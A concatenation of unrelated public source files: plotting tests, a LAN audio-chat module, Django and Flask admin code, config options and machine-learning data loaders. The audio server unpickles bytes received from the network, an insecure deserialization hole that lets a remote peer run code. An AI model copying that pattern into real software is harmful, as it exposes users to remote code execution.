a = plotter_1D(plot_layout(n_plots_x = 1,n_plots_y = 2))
a[0].set_labels('x_label', 'y_label')
a[0].add_data(np.linspace(10,50,50), np.random.random([50]))
a[0,1].set_labels('x_label', 'y_label')
a[0,1].add_data(np.linspace(10,50,50), np.random.random([50]))
a.save('test1D_12.svg')
# a.plot()
a = plotter_1D(plot_layout(n_plots_x = 2,n_plots_y = 2, share_x=True, share_y=True))
a[0].set_labels('x_label', 'y_label')
a[0].add_data(np.linspace(10,50,50), np.random.random([50]), label='test 1')
a[0,1].set_labels('x_label', 'y_label')
a[0,1].add_data(np.linspace(10,50,50), np.random.random([50]), label='test 2')
a[0,1].add_data(np.linspace(10,50,50), np.random.random([50]))
a[1,0].set_labels('x_label', 'y_label')
a[1,0].add_data(np.linspace(10,50,50), np.random.random([50]))
a[1,1].set_labels('x_label', 'y_label')
a[1,1].add_data(np.linspace(10,50,50), np.sin(np.linspace(10,50,50)))
a.save('test1D_22.svg')
# a.plot()
a = plotter_1D(plot_layout((300, 70), n_plots_x = 6,n_plots_y = 1, share_x=False, share_y=True))
a[0].set_labels('time (ns)', 'Spin up probably (%)')
a[0].add_data(np.linspace(0,500,50), np.sin(np.linspace(10,50,50)))
a[1].set_labels('time (ns)', 'Spin up probably (%)')
a[1].add_data(np.linspace(0,500,50), np.sin(np.linspace(10,50,50)))
a[2].set_labels('time (ns)', 'Spin up probably (%)')
a[2].add_data(np.linspace(0,500,50), np.sin(np.linspace(10,50,50)))
a[3].set_labels('time (ns)', 'Spin up probably (%)')
a[3].add_data(np.linspace(0,500,50), np.sin(np.linspace(10,50,50)))
a[4].set_labels('time (ns)', 'Spin up probably (%)')
a[4].add_data(np.linspace(0,500,50), np.sin(np.linspace(10,50,50)))
a[5].set_labels('time (ns)', 'Spin up probably (%)')
a[5].add_data(np.linspace(0,500,50), np.sin(np.linspace(10,50,50)))
print(a)
a.save('test1D_61.svg')
a.plot() | 2.21875 | 2 |
v0.3/achat.py | Forec/lan-ichat | 63 | 6937 | <gh_stars>10-100
# last edit date: 2016/11/2
# author: Forec
# LICENSE
# Copyright (c) 2015-2017, Forec <<EMAIL>>
# Permission to use, copy, modify, and/or distribute this code for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
from socket import *
import threading
import pyaudio
import wave
import sys
import zlib
import struct
import pickle
import time
import numpy as np
CHUNK = 1024
FORMAT = pyaudio.paInt16
CHANNELS = 2
RATE = 44100
RECORD_SECONDS = 0.5
class Audio_Server(threading.Thread):
def __init__(self, remoteIP, remotePort, remoteVersion) :
threading.Thread.__init__(self)
self.setDaemon(True)
self.ADDR = (remoteIP, remotePort)
if remoteVersion == 4:
self.sock = socket(AF_INET ,SOCK_STREAM)
else:
self.sock = socket(AF_INET6 ,SOCK_STREAM)
self.p = pyaudio.PyAudio()
self.stream = None
def __del__(self):
if self.sock is not None:
self.sock.close()
if self.stream is not None:
try:
self.stream.stop_stream()
self.stream.close()
except:
pass
if self.p is not None:
try:
self.p.terminate()
except:
pass
def run(self):
print ("AUDIO server starts...")
while True:
try:
self.sock.connect(self.ADDR)
break
except:
time.sleep(3)
continue
print ("audio server <-> remote server success connected...")
check = "F"
check = self.sock.recv(1)
if check.decode("utf-8") != "S":
return
data = "".encode("utf-8")
payload_size = struct.calcsize("L")
self.stream = self.p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
output=True,
frames_per_buffer = CHUNK
)
while True:
while len(data) < payload_size:
data += self.sock.recv(81920)
packed_size = data[:payload_size]
data = data[payload_size:]
msg_size = struct.unpack("L", packed_size)[0]
while len(data) < msg_size:
data += self.sock.recv(81920)
frame_data = data[:msg_size]
data = data[msg_size:]
frames = pickle.loads(frame_data)
for frame in frames:
self.stream.write(frame, CHUNK)
class Audio_Client(threading.Thread):
def __init__(self ,serverIP, serverPort, serverVersion):
threading.Thread.__init__(self)
self.setDaemon(True)
self.ADDR = (serverIP, serverPort)
if serverVersion == 4:
self.sock = socket(AF_INET, SOCK_STREAM)
else:
self.sock = socket(AF_INET6, SOCK_STREAM)
self.p = pyaudio.PyAudio()
self.stream = None
def __del__(self) :
if self.sock is not None:
self.sock.close()
if self.stream is not None:
try:
self.stream.stop_stream()
self.stream.close()
except:
pass
if self.p is not None:
try:
self.p.terminate()
except:
pass
def run(self):
print ("AUDIO client starts...")
while True:
try:
self.sock.connect(self.ADDR)
break
except:
time.sleep(3)
continue
print ("audio client <-> remote server success connected...")
check = "F"
check = self.sock.recv(1)
if check.decode("utf-8") != "S":
return
print ("remote AUDIO client connected...")
self.stream = self.p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)
while self.stream.is_active():
frames = []
for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):
data = self.stream.read(CHUNK)
frames.append(data)
senddata = pickle.dumps(frames)
try:
self.sock.sendall(struct.pack("L", len(senddata)) + senddata)
except:
break | 2.46875 | 2 |
gdb/util.py | dennereed/paleocore | 1 | 6938 | <filename>gdb/util.py
from gdb.models import *
| 1 | 1 |
iwg_blog/blog/views/__init__.py | razortheory/who-iwg-webapp | 0 | 6939 | <gh_stars>0
from .base import ArticleView, ArticlePreviewView, ArticleListView, SearchView, LandingView, \
CategoryView, TagView, SubscribeForUpdates, UnsubscribeFromUpdates
from .ajax import GetArticleSlugAjax, TagsAutocompleteAjax
from .errors import page_not_found, server_error
| 1.109375 | 1 |
io_import_rbsp/rbsp/rpak_materials.py | snake-biscuits/io_import_rbsp | 7 | 6940 | <reponame>snake-biscuits/io_import_rbsp
# by MrSteyk & Dogecore
# TODO: extraction instructions & testing
import json
import os.path
from typing import List
import bpy
loaded_materials = {}
MATERIAL_LOAD_PATH = "" # put your path here
# normal has special logic
MATERIAL_INPUT_LINKING = {
"color": "Base Color",
"rough": "Roughness",
"spec": "Specular",
"illumm": "Emission",
}
def load_material_data_from_name(subpath):
full_path = MATERIAL_LOAD_PATH + subpath + ".json"
if not os.path.isfile(full_path):
return False
return json.load(open(full_path, "rb"))
def load_image_from_subpath(subpath):
full_path = MATERIAL_LOAD_PATH + subpath
if not os.path.isfile(full_path):
return False
return bpy.data.images.load(full_path)
def load_materials(bsp) -> List[bpy.types.Material]:
materials = []
for material_name in bsp.TEXTURE_DATA_STRING_DATA:
if material_name in loaded_materials:
materials.append(loaded_materials[material_name])
continue
mat_data = load_material_data_from_name(material_name)
material = bpy.data.materials.new("materials/" + material_name)
if not mat_data:
loaded_materials[material_name] = material
materials.append(material)
# raise ValueError(f"Material data for material {material_name} does not exist!")
continue
# print(material_name, mat_data)
material.use_nodes = True
bsdf = material.node_tree.nodes["Principled BSDF"]
# data link
for mat_data_entry in MATERIAL_INPUT_LINKING.keys():
texture_file = mat_data[mat_data_entry]
if texture_file == "":
print(f"Texture type {mat_data_entry} doesn't exist in {material_name}'s material data, skipping.")
continue
img = load_image_from_subpath(texture_file)
if not img:
raise ValueError(f"{material_name}'s texture {texture_file} ({mat_data_entry}) doesn't exist!")
continue
tex = material.node_tree.nodes.new("ShaderNodeTexImage")
tex.image = img
material.node_tree.links.new(bsdf.inputs[MATERIAL_INPUT_LINKING[mat_data_entry]], tex.outputs["Color"])
if mat_data_entry == "color":
material.node_tree.links.new(bsdf.inputs["Alpha"], tex.outputs["Alpha"])
# normal link
if mat_data["normal"] != "":
texture_file = mat_data["normal"]
normalmap = material.node_tree.nodes.new("ShaderNodeNormalMap")
img = load_image_from_subpath(texture_file)
if not img:
raise ValueError(f"Texture {texture_file} for material {material_name} (normal) doesn't exist!")
continue
tex = material.node_tree.nodes.new("ShaderNodeTexImage")
tex.image = img
material.node_tree.links.new(normalmap.inputs["Color"], tex.outputs["Color"])
material.node_tree.links.new(bsdf.inputs["Normal"], normalmap.outputs["Normal"])
loaded_materials[material_name] = material
materials.append(material)
return materials
| 2.28125 | 2 |
initcmds/models.py | alldevic/mtauksync | 0 | 6941 | <filename>initcmds/models.py
from django.db import models
TASK_STATUS = (
("c", "created"),
("p", "progress"),
("s", "success"),
("f", "failed")
)
class TaskModel(models.Model):
lastrunned = models.DateTimeField(
"lastrunned", auto_now=False, auto_now_add=False)
taskname = models.CharField("taskname", max_length=50)
status = models.CharField(max_length=1, choices=TASK_STATUS, default='c')
fail = models.TextField("fail", blank=True, null=True)
def __str__(self) -> str:
return f"{self.taskname} - {self.lastrunned}"
class Meta:
verbose_name = "запуск"
verbose_name_plural = "запуски"
| 2.484375 | 2 |
aardvark/conf/reaper_conf.py | ttsiouts/aardvark | 0 | 6942 | # Copyright (c) 2018 European Organization for Nuclear Research.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
reaper_group = cfg.OptGroup(
'reaper',
title='Aardvark Service Options',
help="Configuration options for Aardvark service")
reaper_opts = [
cfg.StrOpt('reaper_driver',
default='chance_driver',
help="""
The driver that the reaper will use
Possible choices:
* strict_driver: The purpose of the preemptibles existence is to eliminate the
idling resources. This driver gets all the possible offers
from the relevant hosts and tries to find the best matching
for the requested resources. The best matching offer is the
combination of preemptible servers that leave the least
possible resources unused.
* chance_driver: A valid host is selected randomly and in a number of
preconfigured retries, the driver tries to find the instances
that have to be culled in order to have the requested
resources available.
"""
),
cfg.IntOpt('alternatives',
default=1,
help="""
The number of alternative slots that the the reaper will try to free up for
each requested slot.
"""
),
cfg.IntOpt('max_attempts',
default=5,
help="""
The number of alternative slots that the the reaper will try to free up for
each requested slot.
"""
),
cfg.ListOpt('watched_aggregates',
default=[],
help="""
The list of aggregate names that the reaper will try to make space to
Each element of the list can be an aggregate or a combination of aggregates.
Combination of aggregates is a single string with a vertical-line-separated
aggregate names.
e.g. watched_aggregates={agg_name1},{agg_name2}|{agg_name3}',....
For each element in the list, a reaper thread will be spawned and the request
will be forwarded to the responsible worker.
If the provided list is empty, only one worker will be spawned, responsible for
the whole system.
"""
),
cfg.StrOpt('job_backend',
default='redis',
choices=('redis', 'zookeeper'),
help="""
The backend to use for distributed task management.
For this purpose the Reaper uses OpenStack Taskflow. The two supported
backends are redis and zookeper.
"""
),
cfg.StrOpt('backend_host',
default='localhost',
help="""
Specifies the host where the job board backend can be found.
"""
),
]
def register_opts(conf):
conf.register_group(reaper_group)
conf.register_opts(reaper_opts, group=reaper_group)
| 2.234375 | 2 |
src/Data.py | jhlee93/WNet-cGAN-Keras | 7 | 6943 | <filename>src/Data.py
import glob
import numpy as np
class Data:
def __init__(self, path, random=False):
"""
input:
path: path to the folder with subfolders: DSM, PAN, LABEL
max_num: int, num of samples
random: bool, to load samples randomly or from 0 to num_max
"""
self.DSM = sorted(glob.glob(path+"/DSM/*.tif"))
self.PAN = sorted(glob.glob(path+"/PAN/*.tif"))
self.LABEL = sorted(glob.glob(path+"/LABEL/*.tif"))
if len(self.DSM) != len(self.PAN) or len(self.LABEL) != len(self.PAN):
raise ValueError('DSM, PAN or LABEL do not match')
def get_data(self, start=0, num=10, as_arr=True, random=False):
"""
function: load max_num of XY into lists
output: list of numpy arrays, X (images) and Y (labels)
"""
DSM_out = []
PAN_out = []
LABEL_out = []
if random:
idx = np.random.choice(list(range(len(self.X))), num, replace=False)
print('randomly loading {0} tiles from {1} tiles'.format(num, len(self.DSM)))
else:
idx = list(range(start, start+num))
print('loading {0} - {1} image tiles'.format(start, start+num-1))
for i in idx:
DSM_out.append(np.moveaxis(rasterio.open(self.DSM[i]).read(),0,2))
PAN_out.append(np.moveaxis(rasterio.open(self.PAN[i]).read(),0,2))
LABEL_out.append(np.moveaxis(rasterio.open(self.LABEL[i]).read(),0,2))
DSM_remove = [self.DSM[i] for i in idx]
PAN_remove = [self.PAN[i] for i in idx]
LABEL_remove = [self.LABEL[i] for i in idx]
for i in range(len(DSM_remove)):
self.DSM.remove(DSM_remove[i])
self.PAN.remove(PAN_remove[i])
self.LABEL.remove(LABEL_remove[i])
if as_arr:
return np.asarray(DSM_out), np.asarray(PAN_out), np.asarray(LABEL_out)
else:
return DSM_out, PAN_out, LABEL_out
def split_trn_vld_tst(self, vld_rate=0.2, tst_rate=0.0, random=True, seed=10):
np.random.seed(seed)
num = len(self.DSM)
vld_num = int(num*vld_rate)
tst_num = int(num*tst_rate)
print('split into {0} train, {1} validation, {2} test samples'.format(num-vld_num-tst_num, vld_num, tst_num))
idx = np.arange(num)
if random:
np.random.shuffle(idx)
DSM_tst, PAN_tst, LABEL_tst = [self.DSM[k] for k in idx[:tst_num]], [self.PAN[k] for k in idx[:tst_num]], [self.LABEL[k] for k in idx[:tst_num]]
DSM_vld, PAN_vld, LABEL_vld = [self.DSM[k] for k in idx[tst_num:tst_num+vld_num]], [self.PAN[k] for k in idx[tst_num:tst_num+vld_num]], [self.LABEL[k] for k in idx[tst_num:tst_num+vld_num]]
DSM_trn, PAN_trn, LABEL_trn = [self.DSM[k] for k in idx[tst_num+vld_num:]], [self.PAN[k] for k in idx[tst_num+vld_num:]], [self.LABEL[k] for k in idx[tst_num+vld_num:]]
return DSM_trn, PAN_trn, LABEL_trn, DSM_vld, PAN_vld, LABEL_vld, DSM_tst, PAN_tst, LABEL_tst
| 3.078125 | 3 |
count_files.py | xuannianc/keras-retinanet | 0 | 6944 | <filename>count_files.py
import csv
vat_filenames = set()
train_csv_filename = 'train_annotations.csv'
val_csv_filename = 'val_annotations.csv'
for csv_filename in [train_csv_filename, val_csv_filename]:
for line in csv.reader(open(csv_filename)):
vat_filename = line[0].split('/')[-1]
vat_filenames.add(vat_filename)
print(len(vat_filenames))
vat_filenames.clear()
| 2.703125 | 3 |
liberaforms/views/admin.py | ngi-nix/liberaforms | 3 | 6945 | """
This file is part of LiberaForms.
# SPDX-FileCopyrightText: 2020 LiberaForms.org
# SPDX-License-Identifier: AGPL-3.0-or-later
"""
import os, json
from flask import g, request, render_template, redirect
from flask import session, flash, Blueprint
from flask import send_file, after_this_request
from flask_babel import gettext as _
from liberaforms.models.user import User
from liberaforms.models.form import Form
from liberaforms.models.site import Site
from liberaforms.models.invite import Invite
from liberaforms.utils.wraps import *
from liberaforms.utils import utils
from liberaforms.utils.utils import make_url_for, JsonResponse
from liberaforms.utils.dispatcher import Dispatcher
from liberaforms.utils import wtf
from pprint import pprint
admin_bp = Blueprint('admin_bp', __name__,
template_folder='../templates/admin')
@admin_bp.route('/admin', methods=['GET'])
@admin_required
def site_admin():
return render_template('admin-panel.html',
user=g.current_user,
app_version=utils.get_app_version(),
site=g.site)
""" User management """
@admin_bp.route('/admin/users', methods=['GET'])
@admin_required
def list_users():
return render_template('list-users.html',
users=User.find_all(),
invites=Invite.find_all())
@admin_bp.route('/admin/users/<int:id>', methods=['GET'])
@admin_required
def inspect_user(id):
user=User.find(id=id)
if not user:
flash(_("User not found"), 'warning')
return redirect(make_url_for('admin_bp.list_users'))
return render_template('inspect-user.html', user=user)
@admin_bp.route('/admin/users/toggle-blocked/<int:id>', methods=['POST'])
@admin_required
def toggle_user_blocked(id):
user=User.find(id=id)
if not user:
return JsonResponse(json.dumps())
if user.id == g.current_user.id:
# current_user cannot disable themself
blocked=user.blocked
else:
blocked=user.toggle_blocked()
return JsonResponse(json.dumps({'blocked':blocked}))
@admin_bp.route('/admin/users/toggle-admin/<int:id>', methods=['POST'])
@admin_required
def toggle_admin(id):
user=User.find(id=id)
if not user:
return JsonResponse(json.dumps())
if user.username == g.current_user.username:
# current_user cannot remove their own admin permission
is_admin=True
else:
is_admin=user.toggle_admin()
return JsonResponse(json.dumps({'admin':is_admin}))
@admin_bp.route('/admin/users/toggle-uploads-enabled/<int:id>', methods=['POST'])
@admin_required
def toggle_uploads_enabled(id):
user=User.find(id=id)
if not user:
return JsonResponse(json.dumps())
uploads_enabled=user.toggle_uploads_enabled()
return JsonResponse(json.dumps({'uploads_enabled':uploads_enabled}))
@admin_bp.route('/admin/users/delete/<int:id>', methods=['GET', 'POST'])
@admin_required
def delete_user(id):
user=User.find(id=id)
if not user:
flash(_("User not found"), 'warning')
return redirect(make_url_for('admin_bp.list_users'))
if request.method == 'POST' and 'username' in request.form:
if user.is_root_user():
flash(_("Cannot delete root user"), 'warning')
return redirect(make_url_for('admin_bp.inspect_user', id=user.id))
if user.id == g.current_user.id:
flash(_("Cannot delete yourself"), 'warning')
return redirect(make_url_for('admin_bp.inspect_user',
username=user.username))
if user.username == request.form['username']:
user.delete_user()
flash(_("Deleted user '%s'" % (user.username)), 'success')
return redirect(make_url_for('admin_bp.list_users'))
else:
flash(_("Username does not match"), 'warning')
return render_template('delete-user.html', user=user)
@admin_bp.route('/admin/users/csv', methods=['GET'])
@admin_required
def csv_users():
csv_file = g.site.write_users_csv()
@after_this_request
def remove_file(response):
os.remove(csv_file)
return response
return send_file(csv_file, mimetype="text/csv", as_attachment=True)
""" Form management """
@admin_bp.route('/admin/forms', methods=['GET'])
@admin_required
def list_forms():
return render_template('list-forms.html', forms=Form.find_all())
@admin_bp.route('/admin/forms/toggle-public/<int:id>', methods=['GET'])
@admin_required
def toggle_form_public_admin_prefs(id):
queriedForm = Form.find(id=id)
if not queriedForm:
flash(_("Can't find that form"), 'warning')
return redirect(make_url_for('form_bp.my_forms'))
queriedForm.toggle_admin_form_public()
return redirect(make_url_for('form_bp.inspect_form', form_id=id))
""" Invitations """
@admin_bp.route('/admin/invites', methods=['GET'])
@admin_required
def list_invites():
return render_template('list-invites.html', invites=Invite.find_all())
@admin_bp.route('/admin/invites/new', methods=['GET', 'POST'])
@admin_required
def new_invite():
wtform=wtf.NewInvite()
if wtform.validate_on_submit():
message=wtform.message.data
token = utils.create_token(Invite)
#pprint(token)
new_invite=Invite( email=wtform.email.data,
message=message,
token=token,
admin=wtform.admin.data)
new_invite.save()
status = Dispatcher().send_invitation(new_invite)
if status['email_sent'] == True:
flash_text = _("We have sent an invitation to %s" % new_invite.email)
flash(flash_text, 'success')
else:
flash(status['msg'], 'warning')
return redirect(make_url_for('admin_bp.list_invites'))
wtform.message.data=Invite.default_message()
return render_template('new-invite.html',
wtform=wtform,
total_invites=Invite.find_all().count())
@admin_bp.route('/admin/invites/delete/<int:id>', methods=['GET'])
@admin_required
def delete_invite(id):
invite=Invite.find(id=id)
if invite:
invite.delete()
# i18n: Invitation to <EMAIL> deleted OK
flash(_("Invitation to %s deleted OK" % invite.email), 'success')
else:
flash(_("Opps! We can't find that invitation"), 'error')
return redirect(make_url_for('admin_bp.list_invites'))
""" Personal Admin preferences """
@admin_bp.route('/admin/toggle-newuser-notification', methods=['POST'])
@admin_required
def toggle_newUser_notification():
return json.dumps({'notify': g.current_user.toggle_new_user_notification()})
@admin_bp.route('/admin/toggle-newform-notification', methods=['POST'])
@admin_required
def toggle_newForm_notification():
return json.dumps({'notify': g.current_user.toggle_new_form_notification()})
""" ROOT_USERS functions
"""
@admin_bp.route('/admin/forms/change-author/<int:form_id>', methods=['GET', 'POST'])
@rootuser_required
def change_author(form_id):
queriedForm = Form.find(id=form_id)
if not queriedForm:
flash(_("Can't find that form"), 'warning')
return redirect(make_url_for('user_bp.my_forms'))
if request.method == 'POST':
author = queriedForm.author
if not ('old_author_username' in request.form and \
request.form['old_author_username']==author.username):
flash(_("Current author incorrect"), 'warning')
return render_template('change-author.html', form=queriedForm)
if 'new_author_username' in request.form:
new_author=User.find(username=request.form['new_author_username'])
if new_author:
if new_author.enabled:
old_author=author
if queriedForm.change_author(new_author):
log_text = _("Changed author from %s to %s" % (
old_author.username,
new_author.username))
queriedForm.add_log(log_text)
flash(_("Changed author OK"), 'success')
return redirect(make_url_for('form_bp.inspect_form',
form_id=queriedForm.id))
else:
flash(_("Cannot use %s. The user is not enabled" % (
request.form['new_author_username']),
), 'warning')
else:
flash(_("Can't find username %s" % (
request.form['new_author_username'])
), 'warning')
return render_template('change-author.html', form=queriedForm)
| 2.28125 | 2 |
python/zephyr/datasets/score_dataset.py | r-pad/zephyr | 18 | 6946 | <filename>python/zephyr/datasets/score_dataset.py
import os, copy
import cv2
from functools import partial
import numpy as np
import torch
import torchvision
from torch.utils.data import Dataset
from zephyr.data_util import to_np, vectorize, img2uint8
from zephyr.utils import torch_norm_fast
from zephyr.utils.mask_edge import getRendEdgeScore
from zephyr.utils.edges import generate_distance_image
from zephyr.normals import compute_normals
from zephyr.utils.timer import TorchTimer
try:
from zephyr.datasets.bop_raw_dataset import BopRawDataset
except ImportError:
pass
from zephyr.datasets.prep_dataset import PrepDataset
IMPORTANCE_ORDER = [
28, 27, 32, 33, 36, 35, 29, 16, 26, 22, 13, 4, 26, 21, 22
]
class ScoreDataset(Dataset):
def __init__(self, datapoints, dataset_root, dataset_name, args, mode='train', timing = False):
self.args = args
self.datapoints = datapoints
self.dataset_root = dataset_root
self.dataset_name = dataset_name
self.mode = mode
self.return_full_data = False
self.feature_size = args.feature_size
self.norm_cos_weight = args.norm_cos_weight
self.top_n_feat = args.top_n_feat
self.max_hypos = args.max_hypos
self.ppf_only = args.ppf_only
self.n_ppf_hypos = args.n_ppf_hypos
self.n_sift_hypos = args.n_sift_hypos
self.use_mask_test = args.use_mask_test
if args.raw_bop_dataset:
self.loader = BopRawDataset(
args.bop_root, self.dataset_name, args.split, args.split_name, args.ppf_result_file, no_sift=args.ppf_only, no_ppf=args.sift_only
)
else:
self.loader = PrepDataset(
self.dataset_root, self.feature_size
)
self.dim_point = 0
self.dim_render = 0
self.dim_agg = 0
# About timing
self.timing = timing
self.timing_list = []
if args.model_name == "maskconv":
print("Using Point Render dataset")
self.return_rend, self.return_points, self.return_agg = True, True, False
else:
self.return_rend = False
if args.dataset == "feat":
print("Using Agg Dataset")
self.return_points, self.return_agg = False, True
else: # Use PointNet dataset
if "mix" in args.dataset:
print("Using Mix Dataset")
self.return_points, self.return_agg = True, True
else:
print("Using PointNet Dataset")
self.return_points, self.return_agg = True, False
'''For aggregated features Data'''
if self.return_agg:
self.std = None
self.mean = None
self.feature_inliers = True
self.use_hsv = True
self.normalize = True
self.fs_thresh = 0.02
if args.selected_features is not None:
self.selected_features = args.selected_features
print("Using feature indices:", self.selected_features)
elif self.top_n_feat is not None:
self.selected_features = IMPORTANCE_ORDER[:self.top_n_feat]
print("ScoreDataset: Using top features N =", self.top_n_feat)
print("Using feature indices:", self.selected_features)
args.selected_features = self.selected_features
else:
self.selected_features = list(range(39))
print("Using all aggregated features")
args.selected_features = self.selected_features
self.dim_agg = len(self.selected_features)
self.vectorize = partial(vectorize,
use_hsv=self.use_hsv,
feature_inliers=self.feature_inliers,
norm_cos_weight=self.norm_cos_weight,
fs_thresh=self.fs_thresh
)
self.agg_cache = [None for _ in range(len(self.datapoints))]
'''For PointNet Data'''
self.point_x_labels = []
if self.return_points:
self.max_points = args.max_points
args.xyz_channel = [] # indices of point_x channels that define coordinates
args.model_channel = [] # indices of point_x channels that are specific to the object model
'''Mask channel'''
num_features = 0
# valid_proj.unsqueeze(-1).float(),
# valid_depth.unsqueeze(-1).float(),
if not self.args.no_valid_proj:
self.point_x_labels += ['valid_proj']
num_features += 1
if not self.args.no_valid_depth:
self.point_x_labels += ["valid_depth"]
num_features += 1
'''XYZ channel'''
self.uvd, self.uv = False, False
if "uvd" in args.dataset:
self.uvd = True
args.xyz_channel = list(range(num_features, num_features + 3))
num_features +=3
self.point_x_labels += ['u', 'v', 'd']
elif "uv" in args.dataset:
self.uv = True
args.xyz_channel = list(range(num_features, num_features + 2))
num_features += 2
self.point_x_labels += ['u', 'v']
else:
num_features += 0
args.model_channel += args.xyz_channel
num_non_data = num_features
'''Data channel'''
if "cos" in args.dataset:
self.point_x_labels += ['cam_norm_cos']
self.RGB, self.HSV, self.D, self.diff, self.cos, self.edge, self.ppfscore, self.norm_cos = \
False, False, False, False, False, False, False, False
if "RGB" in args.dataset:
self.RGB, self.HSV = True, False
args.model_channel += list(range(num_features, num_features + 3))
num_features += 6
self.point_x_labels += ['R_diff', 'G_diff', 'B_diff'] if "diff" in args.dataset else ["R1", "G1", "B1", "R2", "G2", "B2"]
elif "HSV" in args.dataset:
self.RGB, self.HSV = True, True
args.model_channel += list(range(num_features, num_features + 3))
num_features += 6
self.point_x_labels += ['H_diff', 'S_diff', 'V_diff'] if "diff" in args.dataset else ["H1", "S1", "V1", "H2", "S2", "V2"]
if "D" in args.dataset:
self.D = True
args.model_channel += list(range(num_features, num_features + 1))
num_features += 2
self.point_x_labels += ["D_diff"] if "diff" in args.dataset else ["D1", "D2"]
if "diff" in args.dataset:
self.diff = True
num_features = num_non_data + (num_features-num_non_data) // 2
if "cos" in args.dataset:
self.cos = True
num_features += 1
if "edge" in args.dataset:
self.edge = True
self.edgecos = "edgecos" in args.dataset
self.edgexnor = "edgexnor" in args.dataset
num_features += 1 if (self.edgecos or self.edgexnor) else 2
if self.edgecos:
self.point_x_labels += ['obs_edge_score']
elif self.edgexnor:
self.point_x_labels += ['edge_xnor']
else:
self.point_x_labels += ['obs_edge_score', "rend_edge_score"]
if "ppfscore" in args.dataset:
self.ppfscore = True
num_features += 1
self.point_x_labels += ['ppf_score']
if "norm" in args.dataset:
self.norm_cos = True
num_features += 1
self.point_x_labels += ['norm_cos']
self.seg_mask = False
if "seg" in args.dataset:
self.seg_mask = True
num_features += 1
self.point_x_labels += ['mask', "mask_edge"]
self.dim_point = num_features
'''Train/Test specific config'''
if self.mode == 'train':
print("Initializating training dataset", self.point_x_labels)
self.cojitter = args.cojitter
self.drop_ratio = args.drop_ratio
self.uv_rot = args.uv_rot
else:
print("Initializating %s dataset" % mode, self.point_x_labels)
self.cojitter = False
self.drop_ratio = 0
self.uv_rot = False
self.transform = torchvision.transforms.Compose([
torchvision.transforms.ToPILImage(),
torchvision.transforms.ColorJitter(brightness=0.2, contrast=0.2, saturation=0.2, hue=0.05),
torchvision.transforms.ToTensor(),
])
if self.cojitter:
self.transform_cojitter = torchvision.transforms.Compose([
torchvision.transforms.ToPILImage(),
torchvision.transforms.ColorJitter(brightness=0.5, contrast=0.5, saturation=0.5, hue=0.5),
torchvision.transforms.ToTensor(),
])
print("ScorePointnetDataset: Using cojitter")
if self.return_rend:
self.dim_render = self.dim_point - 1
def __len__(self):
return len(self.datapoints)
def setNormalization(self, var, mean):
var = torch.from_numpy(np.asarray(var))
mean = torch.from_numpy(np.asarray(mean))
self.std = torch.sqrt(var[self.selected_features]).float()
self.mean = mean[self.selected_features].float()
'''Return [n_hypo, n_features]'''
def getAggData(self, data):
x = self.vectorize(data)
x = x[:, self.selected_features]
if self.normalize:
x = (x-self.mean)/self.std
return x
'''Return [n_hypo, n_points, n_features]'''
def getPointNetData(self, data, return_uv_original=False):
with TorchTimer("Data convert 1", agg_list=self.timing_list, timing = self.timing, verbose=False):
img = data['img'].float() # float [0, 1]
depth = data['depth'].float()
if "pbr" in self.dataset_root and self.mode == "train":
# print("blur depth image")
depth = depth * (torch.ones_like(depth) + 0.003 * torch.randn_like(depth))
transforms = data['transforms'].float()
model_points = data['model_points'].float()
model_colors = data['model_colors'].float() # float [0, 1]
model_normals = data['model_normals'].float()
meta_data = data['meta_data']
with TorchTimer("Transform and project", agg_list=self.timing_list, timing = self.timing, verbose=False):
# Transform and project point cloud
trans_pts = torch.einsum('ijk,mk->imj', transforms[:,:3,:3], model_points) + transforms[:,:3,3].unsqueeze(1)
f_cam = torch.tensor([meta_data['camera_fx'], meta_data['camera_fy']])
c_cam = torch.tensor([meta_data['camera_cx'], meta_data['camera_cy']])
proj_pts = trans_pts[:,:,:2]/trans_pts[:,:,2:]*f_cam + c_cam
uv = proj_pts.long()
invalid_proj = (uv[:,:,1]>=img.shape[0]) + (uv[:,:,1]<0) \
+ (uv[:,:,0]>=img.shape[1]) + (uv[:,:,0]< 0)
uv[invalid_proj] = 0
# Projected depth
proj_depth = trans_pts[:,:,-1]
'''Jitter the color as data augmentation'''
if self.mode == "train":
img = img.permute(2, 0, 1) # (H, W, C) to (C, H, W)
img = self.transform(img)
img = img.permute(1, 2, 0) # (C, H, W) to (H, W, C)
if self.cojitter:
H, W, C = img.shape # (H, W, C)
N, _ = model_colors.shape
data_cojitter = torch.cat([
img.reshape((1, -1, 3)),
model_colors.reshape((1, -1, 3))
], dim=1)
data_cojitter = data_cojitter.permute(2, 0, 1)
cojittered = self.transform_cojitter(data_cojitter)
cojittered = cojittered.permute(1, 2, 0)
img = cojittered[0, :H*W, :].reshape((H, W, C))
model_colors = cojittered[0, H*W:, :].reshape((N, C))
# RGb to HSV
with TorchTimer("RGB to HSV", agg_list=self.timing_list, timing = self.timing, verbose=False):
if self.HSV:
with np.errstate(divide='ignore'):
img_rgb = img2uint8(to_np(img))
# img_hsv = rgb2hsv(img_rgb) # this will convert it to range [0, 1]
img_hsv = cv2.cvtColor(img_rgb,cv2.COLOR_RGB2HSV)
img_hsv = img_hsv.astype(float) / 255.0
